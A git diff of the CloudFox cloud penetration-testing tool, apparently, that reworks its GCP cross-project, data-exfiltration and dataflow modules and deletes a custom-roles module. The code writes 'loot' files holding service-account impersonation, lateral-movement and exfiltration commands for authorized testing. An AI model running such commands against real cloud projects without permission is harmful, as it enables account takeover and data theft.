append(tables, internal.TableFile{ - Name: "cost-anomalies", - Header: anomaliesHeader, - Body: anomaliesBody, + Name: "cost-security", + Header: mainHeader, + Body: mainBody, }) } if len(expensiveBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "expensive-resources", + Name: "cost-security-expensive", Header: expensiveHeader, Body: expensiveBody, }) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 8a068f4c..c25e9e01 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -166,101 +166,49 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger // Loot File Management // ------------------------------ func (m *CrossProjectModule) initializeLootFiles() { - m.LootMap["cross-project-bindings"] = &internal.LootFile{ - Name: "cross-project-bindings", - Contents: "# Cross-Project IAM Bindings\n# Generated by CloudFox\n# Service accounts and users with access across project boundaries\n\n", + m.LootMap["crossproject-exploit-commands"] = &internal.LootFile{ + Name: "crossproject-exploit-commands", + Contents: "# Cross-Project Exploit Commands\n# Generated by CloudFox\n\n", } - m.LootMap["cross-project-sas"] = &internal.LootFile{ - Name: "cross-project-sas", - Contents: "# Cross-Project Service Accounts\n# Generated by CloudFox\n# Service accounts with access to multiple projects\n\n", - } - m.LootMap["lateral-movement-paths"] = &internal.LootFile{ - Name: "lateral-movement-paths", - Contents: "# Lateral Movement Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["cross-project-exploitation"] = &internal.LootFile{ - Name: "cross-project-exploitation", - Contents: "# Cross-Project Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - // Cross-tenant/external access loot files - m.LootMap["cross-tenant-access"] = &internal.LootFile{ - Name: "cross-tenant-access", - Contents: "# Cross-Tenant/External Access\n# Principals from outside the organization with access to your projects\n# Generated by CloudFox\n\n", - } - m.LootMap["cross-tenant-external-sas"] = &internal.LootFile{ - Name: "cross-tenant-external-sas", - Contents: "# External Service Accounts with Access\n# Service accounts from other organizations/projects\n# Generated by CloudFox\n\n", - } - m.LootMap["cross-project-security-recommendations"] = &internal.LootFile{ - Name: "cross-project-security-recommendations", - Contents: "# Cross-Project/Cross-Tenant Security Recommendations\n# Generated by CloudFox\n\n", + m.LootMap["crossproject-enum-commands"] = &internal.LootFile{ + Name: "crossproject-enum-commands", + Contents: "# Cross-Project Enumeration Commands\n# External/Cross-Tenant principals with access to your projects\n# Generated by CloudFox\n\n", } } func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { - m.LootMap["cross-project-bindings"].Contents += fmt.Sprintf( - "## [%s] %s -> %s\n"+ - "## Principal: %s\n"+ - "## Role: %s\n", - binding.RiskLevel, binding.SourceProject, binding.TargetProject, - binding.Principal, - binding.Role, - ) - - if len(binding.RiskReasons) > 0 { - m.LootMap["cross-project-bindings"].Contents += "## Risk Reasons:\n" - for _, reason := range binding.RiskReasons { - m.LootMap["cross-project-bindings"].Contents += fmt.Sprintf("## - %s\n", reason) + // Add exploitation commands + if len(binding.ExploitCommands) > 0 { + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# %s -> %s (Principal: %s, Role: %s)\n", + binding.SourceProject, binding.TargetProject, binding.Principal, binding.Role, + ) + for _, cmd := range binding.ExploitCommands { + m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" } + m.LootMap["crossproject-exploit-commands"].Contents += "\n" } - m.LootMap["cross-project-bindings"].Contents += "\n" // Check for cross-tenant/external access if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { - m.LootMap["cross-tenant-access"].Contents += fmt.Sprintf( - "# EXTERNAL ACCESS: %s\n"+ + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "# External Principal: %s\n"+ "# Target Project: %s\n"+ - "# Source (external): %s\n"+ - "# Role: %s\n"+ - "# Risk Level: %s\n"+ - "# This principal is from outside your organization!\n\n", + "# Role: %s\n", binding.Principal, binding.TargetProject, - binding.SourceProject, binding.Role, - binding.RiskLevel, ) - // External service accounts + // External service accounts - add check command if strings.Contains(binding.Principal, "serviceAccount:") { - m.LootMap["cross-tenant-external-sas"].Contents += fmt.Sprintf( - "# External Service Account: %s\n"+ - "# Has access to project: %s\n"+ - "# Role: %s\n"+ - "# Check this SA's permissions:\n"+ - "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n\n", - strings.TrimPrefix(binding.Principal, "serviceAccount:"), - binding.TargetProject, - binding.Role, + m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", binding.TargetProject, strings.TrimPrefix(binding.Principal, "serviceAccount:"), ) } - } - - // Add security recommendations - m.addBindingSecurityRecommendations(binding) - - // Exploitation commands - if len(binding.ExploitCommands) > 0 && (binding.RiskLevel == "CRITICAL" || binding.RiskLevel == "HIGH") { - m.LootMap["cross-project-exploitation"].Contents += fmt.Sprintf( - "## [%s] %s -> %s via %s\n", - binding.RiskLevel, binding.SourceProject, binding.TargetProject, binding.Role, - ) - for _, cmd := range binding.ExploitCommands { - m.LootMap["cross-project-exploitation"].Contents += cmd + "\n" - } - m.LootMap["cross-project-exploitation"].Contents += "\n" + m.LootMap["crossproject-enum-commands"].Contents += "\n" } } @@ -315,91 +263,34 @@ func isCrossTenantPrincipal(principal string, projectIDs []string) bool { return false } -// addBindingSecurityRecommendations generates security recommendations for a cross-project binding -func (m *CrossProjectModule) addBindingSecurityRecommendations(binding crossprojectservice.CrossProjectBinding) { - var recommendations []string - - // CRITICAL: Owner/Editor roles across projects - if strings.Contains(binding.Role, "owner") || strings.Contains(binding.Role, "editor") { - recommendations = append(recommendations, - fmt.Sprintf("[CRITICAL] %s has %s role across projects (%s -> %s)\n"+ - " Risk: Full administrative access to another project\n"+ - " Fix: Use least-privilege roles instead of owner/editor\n"+ - " gcloud projects remove-iam-policy-binding %s --member='%s' --role='%s'\n", - binding.Principal, binding.Role, binding.SourceProject, binding.TargetProject, - binding.TargetProject, binding.Principal, binding.Role)) - } - - // HIGH: Admin roles across projects - if strings.Contains(binding.Role, "admin") && !strings.Contains(binding.Role, "owner") { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] %s has admin role %s in project %s\n"+ - " Risk: Administrative access from external project\n"+ - " Review: Verify this cross-project access is necessary\n"+ - " gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", - binding.Principal, binding.Role, binding.TargetProject, - binding.TargetProject, binding.Principal)) - } - - // External service account access - if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] External principal %s has access to project %s\n"+ - " Risk: Principal from outside your organization has access\n"+ - " Review: Verify this external access is authorized\n"+ - " Fix: Remove external access if not needed:\n"+ - " gcloud projects remove-iam-policy-binding %s --member='%s' --role='%s'\n", - binding.Principal, binding.TargetProject, - binding.TargetProject, binding.Principal, binding.Role)) - } - - if len(recommendations) > 0 { - m.LootMap["cross-project-security-recommendations"].Contents += fmt.Sprintf( - "# Binding: %s -> %s\n%s\n", - binding.SourceProject, binding.TargetProject, - strings.Join(recommendations, "\n")) - } -} - func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { - m.LootMap["cross-project-sas"].Contents += fmt.Sprintf( - "## Service Account: %s\n"+ - "## Home Project: %s\n"+ - "## Cross-Project Access:\n", - sa.Email, sa.ProjectID, - ) - for _, access := range sa.TargetAccess { - m.LootMap["cross-project-sas"].Contents += fmt.Sprintf("## - %s\n", access) - } - m.LootMap["cross-project-sas"].Contents += "\n" - - // Add impersonation commands - m.LootMap["cross-project-exploitation"].Contents += fmt.Sprintf( - "## Impersonate cross-project SA: %s\n"+ + // Add impersonation commands for cross-project SAs + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Cross-project SA: %s (Home: %s)\n"+ "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - sa.Email, sa.Email, + sa.Email, sa.ProjectID, sa.Email, ) } func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { - m.LootMap["lateral-movement-paths"].Contents += fmt.Sprintf( - "## [%s] %s -> %s\n"+ - "## Principal: %s\n"+ - "## Method: %s\n"+ - "## Roles: %s\n", - path.PrivilegeLevel, path.SourceProject, path.TargetProject, + // Add lateral movement exploitation commands + m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + "# Lateral Movement: %s -> %s\n"+ + "# Principal: %s\n"+ + "# Method: %s\n"+ + "# Target Roles: %s\n", + path.SourceProject, path.TargetProject, path.SourcePrincipal, path.AccessMethod, strings.Join(path.TargetRoles, ", "), ) if len(path.ExploitCommands) > 0 { - m.LootMap["lateral-movement-paths"].Contents += "## Exploitation:\n" for _, cmd := range path.ExploitCommands { - m.LootMap["lateral-movement-paths"].Contents += cmd + "\n" + m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" } } - m.LootMap["lateral-movement-paths"].Contents += "\n" + m.LootMap["crossproject-exploit-commands"].Contents += "\n" } // ------------------------------ @@ -407,51 +298,52 @@ func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.L // ------------------------------ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { // Cross-project bindings table + // Reads: Source principal from source project has role on target project bindingsHeader := []string{ - "Risk", "Source Project Name", - "Source Project", + "Source Project ID", + "Source Principal", + "Source Principal Type", + "Action", "Target Project Name", - "Target Project", - "Principal", - "Type", - "Role", - "Reasons", + "Target Project ID", + "Target Role", + "External", } var bindingsBody [][]string for _, binding := range m.CrossBindings { - reasons := strings.Join(binding.RiskReasons, "; ") - if len(reasons) > 50 { - reasons = reasons[:50] + "..." + // Check if external/cross-tenant + external := "No" + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + external = "Yes" } - // Shorten principal for display - principal := binding.Principal - if len(principal) > 40 { - principal = principal[:37] + "..." - } + // Action is always "direct IAM binding" for cross-project bindings + action := "direct IAM binding" bindingsBody = append(bindingsBody, []string{ - binding.RiskLevel, m.GetProjectName(binding.SourceProject), binding.SourceProject, + binding.Principal, + binding.PrincipalType, + action, m.GetProjectName(binding.TargetProject), binding.TargetProject, - principal, - binding.PrincipalType, binding.Role, - reasons, + external, }) } // Cross-project service accounts table + // Reads: Source SA from source project has access to target projects sasHeader := []string{ - "Service Account", - "Home Project Name", - "Home Project", - "# Target Projects", - "Target Access", + "Source Project Name", + "Source Project ID", + "Source Service Account", + "Action", + "Target Project Count", + "Target Access (project:role)", } var sasBody [][]string @@ -465,53 +357,49 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo } } - accessSummary := strings.Join(sa.TargetAccess, "; ") - if len(accessSummary) > 60 { - accessSummary = accessSummary[:60] + "..." - } + // Action describes how the SA has cross-project access + action := "cross-project access" + + // Join target access with newlines for readability + accessList := strings.Join(sa.TargetAccess, "\n") sasBody = append(sasBody, []string{ - sa.Email, m.GetProjectName(sa.ProjectID), sa.ProjectID, + sa.Email, + action, fmt.Sprintf("%d", len(projectSet)), - accessSummary, + accessList, }) } // Lateral movement paths table + // Reads: Source principal from source project can move to target project via method pathsHeader := []string{ - "Privilege", "Source Project Name", - "Source Project", + "Source Project ID", + "Source Principal", + "Action", "Target Project Name", - "Target Project", - "Principal", - "Method", - "Roles", + "Target Project ID", + "Target Roles", } var pathsBody [][]string for _, path := range m.LateralMovementPaths { - // Shorten principal for display - principal := path.SourcePrincipal - if len(principal) > 40 { - principal = principal[:37] + "..." - } + // Use access method as action (human-readable) + action := path.AccessMethod - roles := strings.Join(path.TargetRoles, ", ") - if len(roles) > 40 { - roles = roles[:40] + "..." - } + // Join roles with newlines for readability + roles := strings.Join(path.TargetRoles, "\n") pathsBody = append(pathsBody, []string{ - path.PrivilegeLevel, m.GetProjectName(path.SourceProject), path.SourceProject, + path.SourcePrincipal, + action, m.GetProjectName(path.TargetProject), path.TargetProject, - principal, - path.AccessMethod, roles, }) } diff --git a/gcp/commands/customroles.go b/gcp/commands/customroles.go deleted file mode 100644 index 319257f1..00000000 --- a/gcp/commands/customroles.go +++ /dev/null @@ -1,402 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - customrolesservice "github.com/BishopFox/cloudfox/gcp/services/customRolesService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPCustomRolesCommand = &cobra.Command{ - Use: globals.GCP_CUSTOMROLES_MODULE_NAME, - Aliases: []string{"roles", "custom-role"}, - Short: "Analyze custom IAM roles for dangerous permissions", - Long: `Analyze custom IAM roles for overly permissive or dangerous permissions. - -This module focuses on identifying custom roles that may be exploited for: -- Privilege escalation (SA key creation, token generation, IAM modification) -- Data exfiltration (secret access, storage access, BigQuery access) -- Persistence (instance creation, function deployment, metadata modification) -- Lateral movement (SA impersonation, GKE access, Cloud SQL access) - -Features: -- Lists all custom roles in specified projects -- Identifies dangerous permissions in each role -- Highlights privilege escalation permissions -- Generates exploitation commands for risky roles -- Provides risk scoring (CRITICAL, HIGH, MEDIUM, LOW) - -Use with privesc module for complete privilege escalation analysis.`, - Run: runGCPCustomRolesCommand, -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type CustomRolesModule struct { - gcpinternal.BaseGCPModule - - Roles []customrolesservice.CustomRoleInfo - RoleAnalyses []customrolesservice.RolePermissionAnalysis - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type CustomRolesOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o CustomRolesOutput) TableFiles() []internal.TableFile { return o.Table } -func (o CustomRolesOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPCustomRolesCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CUSTOMROLES_MODULE_NAME) - if err != nil { - return - } - - module := &CustomRolesModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Roles: []customrolesservice.CustomRoleInfo{}, - RoleAnalyses: []customrolesservice.RolePermissionAnalysis{}, - LootMap: make(map[string]*internal.LootFile), - } - - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *CustomRolesModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CUSTOMROLES_MODULE_NAME, m.processProject) - - if len(m.Roles) == 0 { - logger.InfoM("No custom IAM roles found", globals.GCP_CUSTOMROLES_MODULE_NAME) - return - } - - // Count risky roles - criticalCount := 0 - highCount := 0 - for _, role := range m.Roles { - switch role.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d custom role(s)", len(m.Roles)), globals.GCP_CUSTOMROLES_MODULE_NAME) - - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk custom role(s)!", criticalCount, highCount), globals.GCP_CUSTOMROLES_MODULE_NAME) - } - - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *CustomRolesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Analyzing custom roles in project: %s", projectID), globals.GCP_CUSTOMROLES_MODULE_NAME) - } - - svc := customrolesservice.New() - - roles, err := svc.ListCustomRoles(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_CUSTOMROLES_MODULE_NAME, - fmt.Sprintf("Could not enumerate custom roles in project %s", projectID)) - return - } - - var analyses []customrolesservice.RolePermissionAnalysis - for _, role := range roles { - analysis := svc.AnalyzeRoleInDepth(role) - analyses = append(analyses, analysis) - } - - m.mu.Lock() - m.Roles = append(m.Roles, roles...) - m.RoleAnalyses = append(m.RoleAnalyses, analyses...) - - for _, role := range roles { - m.addRoleToLoot(role) - } - for _, analysis := range analyses { - m.addAnalysisToLoot(analysis) - } - m.mu.Unlock() - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d custom role(s) in project %s", len(roles), projectID), globals.GCP_CUSTOMROLES_MODULE_NAME) - } -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *CustomRolesModule) initializeLootFiles() { - m.LootMap["custom-roles-all"] = &internal.LootFile{ - Name: "custom-roles-all", - Contents: "# Custom IAM Roles\n# Generated by CloudFox\n\n", - } - m.LootMap["custom-roles-dangerous"] = &internal.LootFile{ - Name: "custom-roles-dangerous", - Contents: "# Dangerous Custom IAM Roles\n# Generated by CloudFox\n# Roles with privilege escalation or high-risk permissions\n\n", - } - m.LootMap["custom-roles-privesc"] = &internal.LootFile{ - Name: "custom-roles-privesc", - Contents: "# Custom Roles with Privilege Escalation Permissions\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["custom-roles-exploit"] = &internal.LootFile{ - Name: "custom-roles-exploit", - Contents: "# Custom Role Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } -} - -func (m *CustomRolesModule) addRoleToLoot(role customrolesservice.CustomRoleInfo) { - m.LootMap["custom-roles-all"].Contents += fmt.Sprintf( - "## Role: %s\n"+ - "## Project: %s\n"+ - "## Title: %s\n"+ - "## Permissions: %d\n"+ - "## Risk Level: %s\n\n", - role.Name, - role.ProjectID, - role.Title, - role.PermissionCount, - role.RiskLevel, - ) - - // Dangerous roles - if role.RiskLevel == "CRITICAL" || role.RiskLevel == "HIGH" { - m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf( - "## [%s] Role: %s (Project: %s)\n"+ - "## Title: %s\n"+ - "## Permissions: %d\n", - role.RiskLevel, role.Name, role.ProjectID, - role.Title, - role.PermissionCount, - ) - - if len(role.RiskReasons) > 0 { - m.LootMap["custom-roles-dangerous"].Contents += "## Risk Reasons:\n" - for _, reason := range role.RiskReasons { - m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - - if len(role.DangerousPerms) > 0 { - m.LootMap["custom-roles-dangerous"].Contents += "## Dangerous Permissions:\n" - for _, perm := range role.DangerousPerms { - m.LootMap["custom-roles-dangerous"].Contents += fmt.Sprintf("## - %s\n", perm) - } - } - m.LootMap["custom-roles-dangerous"].Contents += "\n" - } - - // Privesc-specific roles - if len(role.PrivescPerms) > 0 { - m.LootMap["custom-roles-privesc"].Contents += fmt.Sprintf( - "## [%s] Role: %s (Project: %s)\n"+ - "## Privilege Escalation Permissions:\n", - role.RiskLevel, role.Name, role.ProjectID, - ) - for _, perm := range role.PrivescPerms { - m.LootMap["custom-roles-privesc"].Contents += fmt.Sprintf("## - %s\n", perm) - } - m.LootMap["custom-roles-privesc"].Contents += "\n" - } -} - -func (m *CustomRolesModule) addAnalysisToLoot(analysis customrolesservice.RolePermissionAnalysis) { - if len(analysis.ExploitCommands) > 0 { - m.LootMap["custom-roles-exploit"].Contents += fmt.Sprintf( - "## [%s] Role: %s (Project: %s)\n"+ - "## Dangerous: %d, Privesc: %d\n", - analysis.RiskLevel, analysis.RoleName, analysis.ProjectID, - analysis.DangerousCount, analysis.PrivescCount, - ) - for _, cmd := range analysis.ExploitCommands { - m.LootMap["custom-roles-exploit"].Contents += cmd + "\n" - } - m.LootMap["custom-roles-exploit"].Contents += "\n" - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *CustomRolesModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main roles table - rolesHeader := []string{ - "Risk", - "Role Name", - "Title", - "Permissions", - "Dangerous", - "Privesc", - "Stage", - "Project Name", - "Project", - } - - var rolesBody [][]string - for i, role := range m.Roles { - dangerousCount := 0 - privescCount := 0 - if i < len(m.RoleAnalyses) { - dangerousCount = m.RoleAnalyses[i].DangerousCount - privescCount = m.RoleAnalyses[i].PrivescCount - } - - rolesBody = append(rolesBody, []string{ - role.RiskLevel, - role.Name, - role.Title, - fmt.Sprintf("%d", role.PermissionCount), - fmt.Sprintf("%d", dangerousCount), - fmt.Sprintf("%d", privescCount), - role.Stage, - m.GetProjectName(role.ProjectID), - role.ProjectID, - }) - } - - // Dangerous permissions table - dangerousHeader := []string{ - "Risk", - "Role", - "Permission", - "Description", - "Project Name", - "Project", - } - - var dangerousBody [][]string - svc := customrolesservice.New() - dangerousPerms := svc.GetDangerousPermissions() - dangerousMap := make(map[string]customrolesservice.DangerousPermission) - for _, dp := range dangerousPerms { - dangerousMap[dp.Permission] = dp - } - - for _, role := range m.Roles { - for _, perm := range role.DangerousPerms { - if dp, found := dangerousMap[perm]; found { - dangerousBody = append(dangerousBody, []string{ - dp.RiskLevel, - role.Name, - perm, - dp.Description, - m.GetProjectName(role.ProjectID), - role.ProjectID, - }) - } - } - } - - // Privesc roles table - privescHeader := []string{ - "Role", - "Privesc Permissions", - "Project Name", - "Project", - } - - var privescBody [][]string - for _, role := range m.Roles { - if len(role.PrivescPerms) > 0 { - perms := strings.Join(role.PrivescPerms, ", ") - if len(perms) > 60 { - perms = perms[:60] + "..." - } - privescBody = append(privescBody, []string{ - role.Name, - perms, - m.GetProjectName(role.ProjectID), - role.ProjectID, - }) - } - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "custom-roles", - Header: rolesHeader, - Body: rolesBody, - }, - } - - if len(dangerousBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "custom-roles-dangerous-perms", - Header: dangerousHeader, - Body: dangerousBody, - }) - } - - if len(privescBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "custom-roles-privesc", - Header: privescHeader, - Body: privescBody, - }) - } - - output := CustomRolesOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CUSTOMROLES_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 3138dba1..ff4ce4d2 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -3,7 +3,6 @@ package commands import ( "context" "fmt" - "sort" "strings" "sync" @@ -485,130 +484,117 @@ func (m *DataExfiltrationModule) analyzeExfiltrationVectors(ctx context.Context, // Loot File Management // ------------------------------ func (m *DataExfiltrationModule) initializeLootFiles() { - m.LootMap["exfil-critical"] = &internal.LootFile{ - Name: "exfil-critical", - Contents: "# Critical Data Exfiltration Paths\n# Generated by CloudFox\n# These require immediate attention!\n\n", - } - m.LootMap["exfil-public-resources"] = &internal.LootFile{ - Name: "exfil-public-resources", - Contents: "# Public Resources (Data Exfiltration Risk)\n# Generated by CloudFox\n\n", - } - m.LootMap["exfil-commands"] = &internal.LootFile{ - Name: "exfil-commands", + m.LootMap["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", } - m.LootMap["exfil-high-risk"] = &internal.LootFile{ - Name: "exfil-high-risk", - Contents: "# High-Risk Exfiltration Resources\n# Generated by CloudFox\n\n", - } +} + +// formatExfilType converts internal type names to user-friendly display names +func formatExfilType(pathType string) string { + typeMap := map[string]string{ + "snapshot": "Disk Snapshot", + "image": "VM Image", + "bucket": "Storage Bucket", + "bigquery_export": "BigQuery Export", + "pubsub_subscription": "Pub/Sub Subscription", + "cloud_functions": "Cloud Function", + "logging_sink": "Logging Sink", + } + if friendly, ok := typeMap[pathType]; ok { + return friendly + } + return pathType } func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { - // Critical paths - if path.RiskLevel == "CRITICAL" { - m.LootMap["exfil-critical"].Contents += fmt.Sprintf( - "## %s: %s\n"+ - "Project: %s\n"+ - "Description: %s\n"+ - "Destination: %s\n"+ - "Risk Reasons:\n", - path.PathType, - path.ResourceName, - path.ProjectID, - path.Description, - path.Destination, - ) - for _, reason := range path.RiskReasons { - m.LootMap["exfil-critical"].Contents += fmt.Sprintf(" - %s\n", reason) - } - m.LootMap["exfil-critical"].Contents += fmt.Sprintf("\nExploit:\n%s\n\n", path.ExploitCommand) + if path.ExploitCommand == "" { + return } - // High-risk paths - if path.RiskLevel == "HIGH" { - m.LootMap["exfil-high-risk"].Contents += fmt.Sprintf( - "## %s: %s\n"+ - "Project: %s\n"+ - "Description: %s\n\n", - path.PathType, - path.ResourceName, - path.ProjectID, - path.Description, - ) - } + // Add to consolidated commands file with description + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n"+ + "# %s\n"+ + "# Destination: %s\n", + formatExfilType(path.PathType), + path.ResourceName, + path.ProjectID, + path.Description, + path.Destination, + ) - // All commands - if path.ExploitCommand != "" { - m.LootMap["exfil-commands"].Contents += fmt.Sprintf( - "# %s: %s (%s)\n%s\n\n", - path.PathType, - path.ResourceName, - path.RiskLevel, - path.ExploitCommand, - ) - } + // Add exploit commands + m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } // ------------------------------ // Output Generation // ------------------------------ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort paths by risk level - sort.Slice(m.ExfiltrationPaths, func(i, j int) bool { - riskOrder := map[string]int{"CRITICAL": 4, "HIGH": 3, "MEDIUM": 2, "LOW": 1} - return riskOrder[m.ExfiltrationPaths[i].RiskLevel] > riskOrder[m.ExfiltrationPaths[j].RiskLevel] - }) - - // Exfiltration paths table - pathsHeader := []string{ - "Type", - "Resource", - "Project Name", + // Single merged table for all exfiltration paths + header := []string{ "Project ID", + "Project Name", + "Resource", + "Type", "Destination", - "Risk", + "Public", + "Size", + } + + var body [][]string + + // Track which resources we've added from PublicExports to avoid duplicates + publicResources := make(map[string]PublicExport) + for _, e := range m.PublicExports { + key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) + publicResources[key] = e } - var pathsBody [][]string + // Add exfiltration paths for _, p := range m.ExfiltrationPaths { - pathsBody = append(pathsBody, []string{ - p.PathType, - truncateString(p.ResourceName, 30), - m.GetProjectName(p.ProjectID), + // Check if this is also in public exports + key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) + publicExport, isPublic := publicResources[key] + + publicStatus := "No" + size := "-" + if isPublic { + publicStatus = "Yes" + size = publicExport.Size + // Remove from map so we don't add it again + delete(publicResources, key) + } + + body = append(body, []string{ p.ProjectID, - truncateString(p.Destination, 30), - p.RiskLevel, + m.GetProjectName(p.ProjectID), + p.ResourceName, + formatExfilType(p.PathType), + p.Destination, + publicStatus, + size, }) } - // Public exports table - exportsHeader := []string{ - "Type", - "Resource", - "Project Name", - "Project ID", - "Access Level", - "Data Type", - "Risk", - } - - var exportsBody [][]string - for _, e := range m.PublicExports { - exportsBody = append(exportsBody, []string{ - e.ResourceType, - e.ResourceName, - m.GetProjectName(e.ProjectID), + // Add any remaining public exports not already covered + for _, e := range publicResources { + body = append(body, []string{ e.ProjectID, - e.AccessLevel, - e.DataType, - e.RiskLevel, + m.GetProjectName(e.ProjectID), + e.ResourceName, + formatExfilType(e.ResourceType), + "Public access", + "Yes", + e.Size, }) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -616,21 +602,12 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna // Build tables tables := []internal.TableFile{} - if len(pathsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "exfil-paths", - Header: pathsHeader, - Body: pathsBody, - }) - } - - if len(exportsBody) > 0 { + if len(body) > 0 { tables = append(tables, internal.TableFile{ - Name: "exfil-public-exports", - Header: exportsHeader, - Body: exportsBody, + Name: "data-exfiltration", + Header: header, + Body: body, }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d public export(s)", len(exportsBody)), GCP_DATAEXFILTRATION_MODULE_NAME) } output := DataExfiltrationOutput{ diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 9111d21e..d67efd20 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -106,30 +106,51 @@ func (m *DataflowModule) processProject(ctx context.Context, projectID string, l } func (m *DataflowModule) initializeLootFiles() { - m.LootMap["dataflow-jobs"] = &internal.LootFile{ - Name: "dataflow-jobs", - Contents: "# Dataflow Jobs\n# Generated by CloudFox\n\n", - } - 